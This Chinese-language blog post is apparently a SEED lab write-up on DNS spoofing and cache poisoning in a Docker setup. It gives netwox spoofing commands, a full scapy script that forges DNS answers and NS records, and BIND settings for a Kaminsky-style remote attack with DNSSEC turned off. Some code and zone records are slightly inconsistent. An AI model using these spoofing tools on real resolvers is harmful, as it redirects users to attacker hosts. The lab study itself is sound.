<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/Imane219.github.io/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/Imane219.github.io/images/favicon-32x32-home.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/Imane219.github.io/images/favicon-16x16-home.png">
  <link rel="mask-icon" href="/Imane219.github.io/images/logo.svg" color="#222">

<link rel="stylesheet" href="/Imane219.github.io/css/main.css">


<link rel="stylesheet" href="/Imane219.github.io/lib/font-awesome/css/all.min.css">



<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"imane219.github.io","root":"/Imane219.github.io/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="原理： DNS用于查询域名对应的IP，域名系统是一个分布式的数据库系统，包括根域名服务器、顶级域（TLD）服务器、权威DNS服务器，本地DNS服务器（在网卡中设置的DNS服务器，作为DNS代理） 用户把DNS查询请求发给本地DNS服务器（当浏览器缓存、操作系统缓存、本地hosts文件都没有找到），DNS服务器先找自己的缓存中有没有对应的IP，没有的话就向根域名服务器查询（有迭代查询和递归查询），再">
<meta property="og:type" content="article">
<meta property="og:title" content="DNS攻击">
<meta property="og:url" content="https://imane219.github.io/project/2021/04/23/DNS%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="Imane&#39;s Blog">
<meta property="og:description" content="原理： DNS用于查询域名对应的IP，域名系统是一个分布式的数据库系统，包括根域名服务器、顶级域（TLD）服务器、权威DNS服务器，本地DNS服务器（在网卡中设置的DNS服务器，作为DNS代理） 用户把DNS查询请求发给本地DNS服务器（当浏览器缓存、操作系统缓存、本地hosts文件都没有找到），DNS服务器先找自己的缓存中有没有对应的IP，没有的话就向根域名服务器查询（有迭代查询和递归查询），再">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE1.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE2.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE3.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE4.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B01.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B02.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B03.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B04.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B05.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B06.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B1.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B2.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B3.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B4.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B5.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B7.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B8.png">
<meta property="og:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B9.png">
<meta property="article:published_time" content="2021-04-23T06:32:43.000Z">
<meta property="article:modified_time" content="2021-05-17T07:40:56.720Z">
<meta property="article:author" content="Imane">
<meta property="article:tag" content="DNS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://imane219.github.io/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE1.png">

<link rel="canonical" href="https://imane219.github.io/project/2021/04/23/DNS%E6%94%BB%E5%87%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>DNS攻击 | Imane's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/Imane219.github.io/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Imane's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/Imane219.github.io/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/Imane219.github.io/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/Imane219.github.io/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/Imane219.github.io/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

  <a href="https://github.com/Imane219" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://imane219.github.io/project/2021/04/23/DNS%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/Imane219.github.io/images/avatar.gif">
      <meta itemprop="name" content="Imane">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Imane's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DNS攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-04-23 14:32:43" itemprop="dateCreated datePublished" datetime="2021-04-23T14:32:43+08:00">2021-04-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-05-17 15:40:56" itemprop="dateModified" datetime="2021-05-17T15:40:56+08:00">2021-05-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/Imane219.github.io/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>原理：</strong></p>
<p>DNS用于查询域名对应的IP，域名系统是一个分布式的数据库系统，包括根域名服务器、顶级域（TLD）服务器、权威DNS服务器，本地DNS服务器（在网卡中设置的DNS服务器，作为DNS代理）</p>
<p>用户把DNS查询请求发给本地DNS服务器（当浏览器缓存、操作系统缓存、本地hosts文件都没有找到），DNS服务器先找自己的缓存中有没有对应的IP，没有的话就向根域名服务器查询（有迭代查询和递归查询），再依次查询子域名（例如<code>www.baidu.com</code>,<code>com.</code>是根域名，根域名服务器会查询.com域名<code>baidu.com.</code>是其子域名等）</p>
<p><strong>前置准备：</strong>使用Ubuntu seed作为实验环境，两个docker容器分别作为本地dns server和user，ip分别为172.17.0.2，172.17.0.3，攻击主机ip为172.17.0.1。设置user的/etc/resolv.conf，将server的ip作为第一个nameserver条目，即将此服务器作为主DNS服务器。如图</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE1.png"></p>
<p>在服务器中运行DNS服务，我们选择BIND 9服务器程序。设置好后启动dns服务，使用命令：<code> sudo service bind9 restart</code>.</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE2.png"></p>
<p>接着在user <code>ping www.google.com</code>，在攻击机上使用wireshark抓docker0的包，如图所示，第一个dns查询报文指向server的ip 172.17.0.2。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE3.png"></p>
<p><strong>配置DNS服务器：</strong>bind9从/etc/bind/named.conf文件中获取其配置，这个文件中会包含几个include选项，配置文件包含在include文件中。其中一个include文件/etc/bind/named.conf.options，我们向其中添加dump-file条目来设置与DNS缓存有关的选项，如果要求bind转储其缓存，则options指定应转储缓存内容的位置；如果未指定位置，则会将缓存转储到名为/var/cache/bind/named_dump.db的默认文件中。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">options&#123;</span><br><span class="line">	dump-file <span class="string">&quot;/var/cache/bind/dump.db&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>下面两个命令和DNS缓存有关，第一个把缓存的内容转储到上面指定的文件；第二个命令清空缓存。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$sudo rndc dumpdb -cache</span><br><span class="line">$sudo rndc flush</span><br></pre></td></tr></table></figure>

<p>到/etc/bind/named.conf.options里面注释掉dnssec-validation条目，添加dnssec-enable条目</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">options&#123;</span><br><span class="line">	<span class="meta">#dnssec-validation auto;</span></span><br><span class="line">	dnssec-enable no;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>在server的本地DNS服务器创建一个区域</strong>：假设server有一个域名example.com。首先在server的/etc/bind/named.conf中添加两个区域条目，一个用于从域名到ip的映射，一个用于ip到域名的映射。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">zone <span class="string">&quot;example.com&quot;</span> &#123;</span><br><span class="line">type master;</span><br><span class="line">file <span class="string">&quot;/etc/bind/example.com.db&quot;</span>;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">zone <span class="string">&quot;0.168.192.in-addr.arpa&quot;</span> &#123;</span><br><span class="line">type master;</span><br><span class="line">file <span class="string">&quot;/etc/bind/192.168.0.db&quot;</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>将本地的example.com.db存入server的/etc/bind/目录下，使用命令:<code>docker cp /home/seed/files/expiriment2/example.com.db 5055b5fc0904:/etc/bind/example.com.db</code>（注意cp的时候用root才能进入docker，但是此时会导致db文件没有读权限，要修改两个db文件的权限）</p>
<p>同样将192.168.0.db存入/etc/bind目录中。</p>
<p>最后重新启动BIND9，用客户机使用命令<code>dig www.example.com</code>向本地DNS服务器查询IP，结果如图所示，其中question section代表DNS查询的内容，查询<code>www.example.com</code>，查询的信息是internet协议（ip协议），A代表是ipv4；answer section代表DNS应答信息，259200代表服务器对该记录的缓存秒数；下面的NS代表后面是DNS服务器。</p>
<blockquote>
<p>dig信息详细介绍参见如下博客：<a target="_blank" rel="noopener" href="https://blog.csdn.net/charleslei/article/details/51226741">https://blog.csdn.net/charleslei/article/details/51226741</a></p>
</blockquote>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%AE%BE%E7%BD%AE4.png"></p>
<p>我们对example.net的查询进行攻击。</p>
<h3 id="DNS本地攻击"><a href="#DNS本地攻击" class="headerlink" title="DNS本地攻击"></a>DNS本地攻击</h3><p>以下都是对本地DNS服务器进行攻击，攻击者可以监听user本地的报文。</p>
<ol>
<li><p><strong>netwox攻击用户主机</strong></p>
<p>使用netwox 105工具，该工具的帮助如图：</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B01.png"></p>
<p>使用命令<code>netwox 105 -h &quot;www.google.com&quot; -H &quot;123.123.123.13&quot; -a &quot;ns.google.com&quot; -A &quot;122.133.123.12&quot; -f &quot;src host 172.17.0.3&quot; -d docker0 -T 10</code>，该命令的意思是，嗅探由f过滤的DNS 请求包，如果嗅探到了就发送DNS响应包，响应包将<code>www.google.com</code>的ip解释为123.123.123.13并假装权威DNS服务器122.133.123.12发送给172.17.0.3 user。</p>
<p>user使<code>dig www.google.com</code>发送DNS查询信息，得到的结果如下，果然<code>www.google.com</code>被解释成了虚假的的ip：123.123.123.13</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B02.png"></p>
</li>
<li><p><strong>netwox攻击服务器缓存（缓存中毒攻击）</strong></p>
<p>首先清空服务器的缓存，使用命令<code>sudo rndc flush</code>.使用netwox命令<code>sudo netwox 105 -h &quot;www.google.com&quot; -H &quot;123.123.123.13&quot; -a &quot;ns.google.com&quot; -A &quot;1.2.3.4&quot; -d ens33 -T 600 -s raw</code>，注意此时在这里并不选择过滤，网卡也不选择docker0，因为服务器会像外界发送DNS查询，那么就用外界通信的网卡ens33。</p>
<p>可以看到server的缓存成功存入了我们发送的响应包内容，user查询得到的结果也是我们预设的结果。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B03.png"></p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B04.png"></p>
</li>
<li><p><strong>scapy进行DNS缓存中毒攻击</strong></p>
<p>代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line">local_dns_srv = <span class="string">&quot;172.17.0.2&quot;</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">spoof_dns</span>(<span class="params">pkt</span>):</span></span><br><span class="line">  <span class="keyword">if</span> (DNS <span class="keyword">in</span> pkt <span class="keyword">and</span> <span class="string">&#x27;www.google.com&#x27;</span> <span class="keyword">in</span> pkt[DNS].qd.qname.decode(<span class="string">&#x27;utf-8&#x27;</span>)):</span><br><span class="line">   old_ip = pkt[IP]</span><br><span class="line">   old_udp = pkt[UDP]</span><br><span class="line">   old_dns = pkt[DNS]</span><br><span class="line">   ip=IP(dst = old_ip.src,src = old_ip.dst)</span><br><span class="line">   udp=UDP(dport = old_udp.sport,sport = <span class="number">53</span>)</span><br><span class="line">  </span><br><span class="line">   <span class="comment">#The answer section</span></span><br><span class="line">   Anssec = DNSRR(rrname = old_dns.qd.qname,<span class="built_in">type</span> = <span class="string">&#x27;A&#x27;</span>,rdata = <span class="string">&#x27;123.123.123.13&#x27;</span>,ttl = <span class="number">260000</span>)</span><br><span class="line">  </span><br><span class="line">   <span class="comment">#The authority section  </span></span><br><span class="line">   NSsec1 = DNSRR(rrname = <span class="string">&#x27;google.net&#x27;</span>, <span class="built_in">type</span> = <span class="string">&#x27;NS&#x27;</span>, rdata = <span class="string">&#x27;ns1.google.net&#x27;</span>, ttl = <span class="number">260000</span>)</span><br><span class="line">   NSsec2 = DNSRR(rrname = <span class="string">&#x27;google.net&#x27;</span>, <span class="built_in">type</span> = <span class="string">&#x27;NS&#x27;</span>, rdata = <span class="string">&#x27;ns2.google.net&#x27;</span>, ttl = <span class="number">260000</span>)</span><br><span class="line"></span><br><span class="line">   <span class="comment">#The additional section</span></span><br><span class="line">Addsec1 = DNSRR(rrname = <span class="string">&#x27;ns1.google.net&#x27;</span>, <span class="built_in">type</span> = <span class="string">&#x27;A&#x27;</span>, rdata = <span class="string">&#x27;1.2.3.4&#x27;</span>, ttl = <span class="number">260000</span>)</span><br><span class="line">   Addsec2 = DNSRR(rrname = <span class="string">&#x27;ns2.google.net&#x27;</span>, <span class="built_in">type</span> = <span class="string">&#x27;A&#x27;</span>, rdata = <span class="string">&#x27;5.6.7.8&#x27;</span>, ttl = <span class="number">260000</span>)</span><br><span class="line"></span><br><span class="line">   dns = DNS(<span class="built_in">id</span> = old_dns.<span class="built_in">id</span>,aa = <span class="number">1</span>,rd = <span class="number">0</span>,qr = <span class="number">1</span>,qdcount = <span class="number">1</span>,ancount = <span class="number">1</span>,nscount = <span class="number">2</span>,arcount = <span class="number">2</span>,qd = old_dns.qd, an = Anssec, ns = NSsec1/NSsec2, ar = Addsec1/Addsec2)</span><br><span class="line">   spoofpkt = ip/udp/dns</span><br><span class="line">   send(spoofpkt)</span><br><span class="line">f = <span class="string">&#x27;udp and (src host &#123;&#125; and dst port 53)&#x27;</span>.<span class="built_in">format</span>(local_dns_srv)</span><br><span class="line">sniff(<span class="built_in">filter</span>=f,prn=spoof_dns,iface = <span class="string">&quot;docker0&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>在攻击机执行以上代码，user进行<code>www.google.com</code>的DNS查询，可以看到server的缓存已经被成功更改，并且user查询出来的结果也变成了篡改后的结果。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B05.png"></p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E6%9C%AC%E5%9C%B06.png"></p>
</li>
</ol>
<h3 id="DNS远程攻击"><a href="#DNS远程攻击" class="headerlink" title="DNS远程攻击"></a>DNS远程攻击</h3><p>当本地DNS服务器和攻击者主机不在同一个域中，攻击者无法对DNS请求包进行嗅探，此时需要远程攻击的方法。</p>
<p>如图所示，当发出一个DNS请求，本地DNS服务器会从根域名服务器开始迭代查询，当最后得到<code>www.example.com</code>的ip时（7），我们伪造该包并抢先在权威服务器之前发送伪造的数据包，改变ip地址和权威DNS服务器的地址（主要要把权威服务器的地址改成攻击者的地址）。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B1.png"></p>
<p>由于无法嗅探得到事务id和本地DNS服务器的发送端口号，我们采用暴力枚举的方法。简便起见，假定本地DNS服务器的发送端口号固定为33333，我们只需枚举出事务id即可。而仅仅对一个DNS查询进行枚举事务id、伪造数据包，不一定能赶在真正的数据包达到之前发送成功，倘若本地DNS服务器接收了真正的数据包，它将把结果缓存一段时间，此时攻击者再次发起查询DNS服务器将在缓存中找到结果而非查example.comDNS服务器，也就没办法发起下一次欺骗。因此采用Kaminsky攻击：发送多个DNS查询请求，如<code>dig www.example.com</code> <code>dig aaa.example.com</code>，尽管有些域名可能没用意义，但是只要成功就可以修改本地DNS服务器中 权威服务器的ip地址<code>ns.example.com</code>为攻击者的DNS服务器的地址，这时攻击者就取代了example.com权威服务器.</p>
<h4 id="前置准备："><a href="#前置准备：" class="headerlink" title="前置准备："></a>前置准备：</h4><p><strong>对攻击机进行配置：</strong></p>
<ol>
<li><p>首先需要将攻击机的本地DNS服务器设置为server，因为攻击机发送查询报文的时候是向server发送的。在攻击机中使用命令<code>vi /etc/resolv.conf</code> 将nameserver 172.17.0.2放在最前面，如图所示，在攻击机中<code>ping www.baidu.com</code>使用wireshark抓包查看是否dns报文是否由172.17.0.1(攻击机)发给172.17.0.2(server)</p>
<p> <img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B2.png"></p>
<p> 在ubuntu中，/etc/resolv.conf可能被DHCP客户端更改，所以需要将DHCP关闭，在/etc/resolvconf/resolv.conf.d/head文件中添加nameserver 172.17.0.2，执行命令<code>sudo resolvconf -u</code>完成设置。</p>
</li>
<li><p>配置攻击机的DNS服务，在攻击机的/etc/bind/named.conf.local中添加如下代码，如图所示：</p>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">zone <span class="string">&quot;example.com&quot;</span>&#123;</span><br><span class="line">        type master;</span><br><span class="line">        file <span class="string">&quot;/etc/bind/example.com.zone&quot;</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p> <img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B3.png"></p>
<p> 接着创建文件/etc/bind/example.com.zone，用以下代码填充，如图所示：</p>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$TTL <span class="number">3</span>D</span><br><span class="line">@                IN      SOA     ns.example.com. admin.example.com. (</span><br><span class="line">                         <span class="number">2008111001</span></span><br><span class="line">                         <span class="number">8</span>H</span><br><span class="line">                         <span class="number">2</span>H</span><br><span class="line">                         <span class="number">4</span>W</span><br><span class="line">                         <span class="number">1</span>D)</span><br><span class="line"></span><br><span class="line">@                IN      NS      ns.iamen.net.</span><br><span class="line"></span><br><span class="line">www              IN      A       <span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span></span><br><span class="line">mail             IN      A       <span class="number">1.1</span><span class="number">.1</span><span class="number">.2</span></span><br><span class="line">*.example.net    IN      A       <span class="number">1.1</span><span class="number">.1</span><span class="number">.100</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p> <img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B4.png"></p>
<p> 此时攻击机的DNS服务已经可以响应对example.com的查询了，当伪造报文将server的DNS服务器引导到攻击机上时，它就可以做出响应，并把ns设置为huyiman.net</p>
</li>
<li><p>设置server的dns服务</p>
<p> 在远程攻击实验中，server作为用户的本地DNS服务器，而非分管example.com的权威服务器，攻击者在攻击针对example.com的查询时，这个查询是对真实世界中的example.com的查询，而非server中配置的，因此我们需要将server中example.com区域注释掉（在/etc/bind/named.conf中）</p>
<p> 此外还需要将dns查询端口号固定为33333，便于攻击。在/etc/bind/named.conf.options中添加<code>query-source port 33333</code>即可。</p>
<p> 我们还需要关闭DNS服务的DNSSEC功能，DNSSEC可以抵抗缓存中毒攻击。在/etc/bind/named.conf.options注释掉<code>dnssec-validation auto</code>行即可。如图所示：</p>
<p> <img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B5.png"></p>
<p> 在攻击机的配置中，我们添加了huyiman.net，然而这样不存在的域名并不会被server的DNS服务所认可，因此我们需要进行设置。在/etc/bind/named.conf.default-zones文件中添加如下代码：</p>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">zone <span class="string">&quot;ns.huyiman.net&quot;</span>&#123;</span><br><span class="line">    type master;</span><br><span class="line">    file <span class="string">&quot;/etc/bind/db.attacker&quot;</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p> 接着创建文件/etc/bind/db.attacker，将如下代码加入其中，设置ns.huyiman.net对应的ip是172.17.0.1</p>
 <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">;</span><br><span class="line">; BIND data file <span class="keyword">for</span> local loopback interface</span><br><span class="line">;</span><br><span class="line">$TTL	<span class="number">604800</span></span><br><span class="line">@	IN	SOA	localhost. root.localhost. (</span><br><span class="line">			      <span class="number">2</span>		; Serial</span><br><span class="line">			 <span class="number">604800</span>		; Refresh</span><br><span class="line">			  <span class="number">86400</span>		; Retry</span><br><span class="line">			<span class="number">2419200</span>		; Expire</span><br><span class="line">			 <span class="number">604800</span> )	; Negative Cache TTL</span><br><span class="line">;</span><br><span class="line">@	IN	NS	ns.huyiman.net.</span><br><span class="line">@	IN	A	<span class="number">172.17</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">@	IN	AAAA	::<span class="number">1</span></span><br></pre></td></tr></table></figure></li>
</ol>
<p>全部设置完成后，重启server和攻击机的DNS服务。</p>
<h4 id="远程DNS缓存中毒攻击"><a href="#远程DNS缓存中毒攻击" class="headerlink" title="远程DNS缓存中毒攻击"></a>远程DNS缓存中毒攻击</h4><p>因为C语言更接近底层，能够更快地完成发送，因此我们使用C语言完成攻击。</p>
